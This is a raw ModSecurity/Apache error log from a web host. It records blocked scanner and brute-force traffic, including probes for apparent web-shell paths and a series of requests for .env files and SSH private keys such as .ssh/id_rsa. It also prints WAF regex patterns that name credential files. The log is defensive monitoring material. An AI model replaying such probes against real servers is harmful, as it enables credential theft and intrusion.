[Tue May 26 18:05:09.311079 2026] [security2:error] [pid 960743:tid 960976] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTfPQvEln_BHBy2zJ1vgAAAOw"]
[Tue May 26 18:05:09.639422 2026] [security2:error] [pid 960743:tid 960956] [client 185.192.70.69:62549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/default.php"] [unique_id "ahWTffQvEln_BHBy2zJ1zQAAANg"]
[Tue May 26 18:05:10.722974 2026] [security2:error] [pid 960743:tid 960897] [client 82.76.238.33:64200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTfvQvEln_BHBy2zJ15wAAAJ0"]
[Tue May 26 18:05:10.723135 2026] [security2:error] [pid 960743:tid 960897] [client 82.76.238.33:64200] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTfvQvEln_BHBy2zJ15wAAAJ0"]
[Tue May 26 18:05:10.926737 2026] [security2:error] [pid 960743:tid 960875] [client 185.192.70.77:62985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/assets/info.php"] [unique_id "ahWTfvQvEln_BHBy2zJ16wAAAIc"]
[Tue May 26 18:05:11.197108 2026] [security2:error] [pid 960743:tid 960866] [remote 74.7.241.58:44586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWTf_QvEln_BHBy2zJ18gAA7no"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:05:11.820916 2026] [security2:error] [pid 960743:tid 960880] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTf_QvEln_BHBy2zJ1-AAAAIw"]
[Tue May 26 18:05:11.910495 2026] [security2:error] [pid 960743:tid 960865] [remote 141.95.202.18:48822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWTf_QvEln_BHBy2zJ2AgAAr3k"]
[Tue May 26 18:05:12.045880 2026] [security2:error] [pid 960743:tid 960998] [client 185.192.70.76:48235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/class.api.php"] [unique_id "ahWTgPQvEln_BHBy2zJ2BgAAAQI"]
[Tue May 26 18:05:13.183975 2026] [security2:error] [pid 960743:tid 960999] [client 185.192.70.73:21437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahWTgfQvEln_BHBy2zJ2IwAAAQM"]
[Tue May 26 18:05:13.880519 2026] [security2:error] [pid 960743:tid 960958] [client 136.243.228.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTgfQvEln_BHBy2zJ2OQAAANo"]
[Tue May 26 18:05:14.157206 2026] [security2:error] [pid 960743:tid 960949] [client 185.192.70.73:62461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/chosen.php"] [unique_id "ahWTgvQvEln_BHBy2zJ2QQAAANE"]
[Tue May 26 18:05:14.758581 2026] [security2:error] [pid 960743:tid 960951] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTgvQvEln_BHBy2zJ2SQAAANM"]
[Tue May 26 18:05:14.995379 2026] [security2:error] [pid 960743:tid 960943] [client 128.199.178.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWTgvQvEln_BHBy2zJ2VwAAAMs"], referer: https://earthone.me/
[Tue May 26 18:05:15.181018 2026] [security2:error] [pid 960743:tid 960946] [client 185.192.70.71:43603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/autoload_classmap/bypass.php"] [unique_id "ahWTg_QvEln_BHBy2zJ2ZAAAAM4"]
[Tue May 26 18:05:15.420767 2026] [security2:error] [pid 960743:tid 960752] [remote 167.114.139.205:30522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.soto-plumbing.com"] [uri "/robots.txt"] [unique_id "ahWTg_QvEln_BHBy2zJ2bgAA_Qg"]
[Tue May 26 18:05:15.420991 2026] [security2:error] [pid 960743:tid 960993] [client 167.114.139.205:30522] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.soto-plumbing.com"] [uri "/robots.txt"] [unique_id "ahWTg_QvEln_BHBy2zJ2bgAA_Qg"]
[Tue May 26 18:05:16.409725 2026] [security2:error] [pid 960743:tid 960924] [client 185.192.70.94:28735] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/dropdown.php"] [unique_id "ahWThPQvEln_BHBy2zJ2jQAAALg"]
[Tue May 26 18:05:16.764470 2026] [security2:error] [pid 960743:tid 960992] [client 14.233.172.156:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWThPQvEln_BHBy2zJ2kwAAAPw"], referer: https://earthone.me/
[Tue May 26 18:05:16.854244 2026] [security2:error] [pid 960743:tid 960754] [remote 142.44.220.218:22432] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.soto-plumbing.com"] [uri "/"] [unique_id "ahWThPQvEln_BHBy2zJ2oAAAlAo"]
[Tue May 26 18:05:16.854411 2026] [security2:error] [pid 960743:tid 960888] [client 142.44.220.218:22432] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.soto-plumbing.com"] [uri "/"] [unique_id "ahWThPQvEln_BHBy2zJ2oAAAlAo"]
[Tue May 26 18:05:17.196439 2026] [security2:error] [pid 960743:tid 960942] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWThPQvEln_BHBy2zJ2nQAAAMo"]
[Tue May 26 18:05:18.309012 2026] [security2:error] [pid 960743:tid 960827] [remote 84.247.181.196:59896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWThvQvEln_BHBy2zJ2vAAA81M"]
[Tue May 26 18:05:18.521539 2026] [security2:error] [pid 960743:tid 960927] [client 185.192.70.86:57141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/images/admin.php"] [unique_id "ahWThvQvEln_BHBy2zJ2ygAAALs"]
[Tue May 26 18:05:18.645302 2026] [security2:error] [pid 960743:tid 960834] [remote 84.247.181.196:59896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWThvQvEln_BHBy2zJ2zQAAjVo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:05:19.088334 2026] [security2:error] [pid 960743:tid 960918] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWThvQvEln_BHBy2zJ21AAAALI"]
[Tue May 26 18:05:20.444391 2026] [security2:error] [pid 960743:tid 960886] [client 185.192.70.78:63027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/db.php"] [unique_id "ahWTiPQvEln_BHBy2zJ2_wAAAJI"]
[Tue May 26 18:05:21.041850 2026] [security2:error] [pid 960743:tid 960980] [client 82.76.238.33:64612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTifQvEln_BHBy2zJ3EwAAAPA"]
[Tue May 26 18:05:21.042007 2026] [security2:error] [pid 960743:tid 960980] [client 82.76.238.33:64612] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTifQvEln_BHBy2zJ3EwAAAPA"]
[Tue May 26 18:05:21.581285 2026] [security2:error] [pid 960743:tid 960972] [client 113.186.218.131:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTifQvEln_BHBy2zJ3GQAAAOg"]
[Tue May 26 18:05:21.691914 2026] [security2:error] [pid 960743:tid 960948] [client 185.192.70.3:40715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/.well-known/pki-validation/mariju.php"] [unique_id "ahWTifQvEln_BHBy2zJ3IAAAANA"]
[Tue May 26 18:05:21.725157 2026] [security2:error] [pid 960743:tid 960958] [client 66.249.66.167:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWTiPQvEln_BHBy2zJ3AgAAANo"]
[Tue May 26 18:05:22.308142 2026] [security2:error] [pid 960743:tid 960979] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTifQvEln_BHBy2zJ3LAAAAO8"]
[Tue May 26 18:05:22.733318 2026] [security2:error] [pid 960743:tid 960989] [client 45.33.109.8:51575] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahWTivQvEln_BHBy2zJ3QwAAAPk"]
[Tue May 26 18:05:23.957630 2026] [security2:error] [pid 960743:tid 960889] [client 185.192.70.77:31509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/mah/function.php"] [unique_id "ahWTi_QvEln_BHBy2zJ3ZwAAAJU"]
[Tue May 26 18:05:24.768608 2026] [security2:error] [pid 960743:tid 960991] [client 5.255.120.167:52408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahWTjPQvEln_BHBy2zJ3gwAAAPs"]
[Tue May 26 18:05:24.848235 2026] [security2:error] [pid 960743:tid 960999] [client 5.255.120.167:52360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahWTjPQvEln_BHBy2zJ3lwAAAQM"]
[Tue May 26 18:05:24.848410 2026] [security2:error] [pid 960743:tid 960983] [client 5.255.120.167:52490] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_rsa"] [unique_id "ahWTjPQvEln_BHBy2zJ3mAAAAPM"]
[Tue May 26 18:05:24.850163 2026] [security2:error] [pid 960743:tid 960974] [client 5.255.120.167:52462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahWTjPQvEln_BHBy2zJ3mQAAAOo"]
[Tue May 26 18:05:24.926802 2026] [security2:error] [pid 960743:tid 960879] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTjPQvEln_BHBy2zJ3dwAAAIs"]
[Tue May 26 18:05:25.120824 2026] [security2:error] [pid 960743:tid 960930] [client 5.255.120.167:52462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahWTjfQvEln_BHBy2zJ3rgAAAL4"]
[Tue May 26 18:05:25.120949 2026] [security2:error] [pid 960743:tid 960940] [client 5.255.120.167:52276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahWTjfQvEln_BHBy2zJ3rQAAAMg"]
[Tue May 26 18:05:25.130869 2026] [security2:error] [pid 960743:tid 960913] [client 185.192.70.99:30953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/bypass.php"] [unique_id "ahWTjfQvEln_BHBy2zJ3sQAAAK0"]
[Tue May 26 18:05:25.230310 2026] [security2:error] [pid 960743:tid 960897] [client 5.255.120.167:52338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahWTjfQvEln_BHBy2zJ3uQAAAJ0"]
[Tue May 26 18:05:25.231067 2026] [security2:error] [pid 960743:tid 960910] [client 5.255.120.167:52360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/public/.env"] [unique_id "ahWTjfQvEln_BHBy2zJ3vAAAAKo"]
[Tue May 26 18:05:25.233016 2026] [security2:error] [pid 960743:tid 960926] [client 5.255.120.167:52310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_dsa"] [unique_id "ahWTjfQvEln_BHBy2zJ3uwAAALo"]
[Tue May 26 18:05:25.559613 2026] [security2:error] [pid 960743:tid 960772] [remote 38.95.35.74:57846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTjfQvEln_BHBy2zJ3zwAAyxw"]
[Tue May 26 18:05:25.818824 2026] [security2:error] [pid 960743:tid 960893] [client 5.255.120.167:52554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ameritradeng.com"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahWTjfQvEln_BHBy2zJ37QAAAJk"]
[Tue May 26 18:05:25.937064 2026] [security2:error] [pid 960743:tid 960799] [remote 38.95.35.74:57846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTjfQvEln_BHBy2zJ39QAA4zc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:05:26.382754 2026] [security2:error] [pid 960743:tid 960908] [client 185.192.70.70:55615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/admin.php"] [unique_id "ahWTjvQvEln_BHBy2zJ4DgAAAKg"]
[Tue May 26 18:05:27.400708 2026] [security2:error] [pid 960743:tid 960985] [client 185.192.70.85:57151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/themes/tflow/up.php"] [unique_id "ahWTj_QvEln_BHBy2zJ4KgAAAPU"]
[Tue May 26 18:05:27.562110 2026] [security2:error] [pid 960743:tid 960948] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTj_QvEln_BHBy2zJ4IwAAANA"]
[Tue May 26 18:05:27.816165 2026] [security2:error] [pid 960743:tid 960968] [client 150.223.194.179:62243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.194.223.150.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWTj_QvEln_BHBy2zJ4MgAAAOQ"]
[Tue May 26 18:05:28.751466 2026] [security2:error] [pid 960743:tid 960888] [client 185.192.70.96:46001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/function.php"] [unique_id "ahWTkPQvEln_BHBy2zJ4bQAAAJQ"]
[Tue May 26 18:05:29.249763 2026] [core:error] [pid 960743:tid 960952] [client 45.154.98.198:56522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.249783 2026] [core:error] [pid 960743:tid 960952] [client 45.154.98.198:56522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.263189 2026] [autoindex:error] [pid 960743:tid 960945] [client 45.154.98.198:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/service.google.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
